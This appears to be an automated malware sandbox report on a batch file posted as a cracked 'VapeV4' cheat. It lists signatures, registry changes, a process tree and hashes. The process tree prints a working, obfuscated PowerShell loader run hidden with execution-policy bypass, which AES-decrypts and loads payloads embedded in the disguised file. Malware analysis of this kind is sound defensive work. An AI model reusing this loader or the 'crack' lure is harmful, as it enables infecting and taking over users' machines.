Resubmissions
Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
03/06/2024, 18:28
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
Resource
win10v2004-20240426-en
General
-
Target
https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation VapeV4-cracked.bat.exe -
Executes dropped EXE 2 IoCs
pid Process 3368 VapeV4-cracked.bat.exe 3524 VapeV4-cracked.bat.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 raw.githubusercontent.com 8 raw.githubusercontent.com -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 56 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000096c7af35d697da0165473838d697da0129c8fb38d697da0114000000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4148 msedge.exe 4148 msedge.exe 2704 msedge.exe 2704 msedge.exe 1048 msedge.exe 1048 msedge.exe 3368 VapeV4-cracked.bat.exe 3368 VapeV4-cracked.bat.exe 3524 VapeV4-cracked.bat.exe 3524 VapeV4-cracked.bat.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3368 VapeV4-cracked.bat.exe Token: SeDebugPrivilege 3524 VapeV4-cracked.bat.exe -
Suspicious use of FindShellTrayWindow 31 IoCs
pid Process 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe 2704 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1048 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2704 wrote to memory of 4208 2704 msedge.exe 81 PID 2704 wrote to memory of 4208 2704 msedge.exe 81 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4160 2704 msedge.exe 82 PID 2704 wrote to memory of 4148 2704 msedge.exe 83 PID 2704 wrote to memory of 4148 2704 msedge.exe 83 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84 PID 2704 wrote to memory of 3084 2704 msedge.exe 84
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9a06c46f8,0x7ff9a06c4708,0x7ff9a06c47182⤵PID:4208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:22⤵PID:4160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:82⤵PID:3084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:12⤵PID:5172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:12⤵PID:1408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5160 /prefetch:82⤵PID:2836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14112293004265777115,3393408337875786106,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:12⤵PID:3004
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1688
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1872
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\VapeV4-cracked.bat1⤵PID:2648
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\VapeV4-cracked.bat1⤵PID:5244
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Drops file in Windows directory
PID:2348 -
C:\Windows\system32\net.exenet session2⤵PID:1128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4404
-
-
-
C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe"VapeV4-cracked.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DlXiw($jnfYj){ $QpJJS=[System.Security.Cryptography.Aes]::Create(); $QpJJS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QpJJS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QpJJS.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hq6nkjA2Agpp6rzE5ZH6qEdc87VQUGJSupueX0Nn2kI='); $QpJJS.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yCS6Miz0G0oYyOqVwRYRZw=='); $GHgia=$QpJJS.CreateDecryptor(); $return_var=$GHgia.TransformFinalBlock($jnfYj, 0, $jnfYj.Length); $GHgia.Dispose(); $QpJJS.Dispose(); $return_var;}function cuzkB($jnfYj){ $vMlyC=New-Object System.IO.MemoryStream(,$jnfYj); $jWECR=New-Object System.IO.MemoryStream; $xNVjy=New-Object System.IO.Compression.GZipStream($vMlyC, [IO.Compression.CompressionMode]::Decompress); $xNVjy.CopyTo($jWECR); $xNVjy.Dispose(); $vMlyC.Dispose(); $jWECR.Dispose(); $jWECR.ToArray();}function htDyt($jnfYj,$nQBBf){ $ryoCK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$jnfYj); $HgyeT=$ryoCK.EntryPoint; $HgyeT.Invoke($null, $nQBBf);}$zXORP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\VapeV4-cracked.bat').Split([Environment]::NewLine);foreach ($pJAbE in $zXORP) { if ($pJAbE.StartsWith('SEROXEN')) { $VXJBB=$pJAbE.Substring(7); break; }}$pogEs=[string[]]$VXJBB.Split('\');$WRGtE=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[0])));$HmueV=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[1])));htDyt $HmueV (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));htDyt $WRGtE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe"C:\Users\Admin\Desktop\VapeV4-cracked.bat.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3524
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5ae54e9db2e89f2c54da8cc0bfcbd26bd
SHA1a88af6c673609ecbc51a1a60dfbc8577830d2b5d
SHA2565009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af
SHA512e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998
-
Filesize
152B
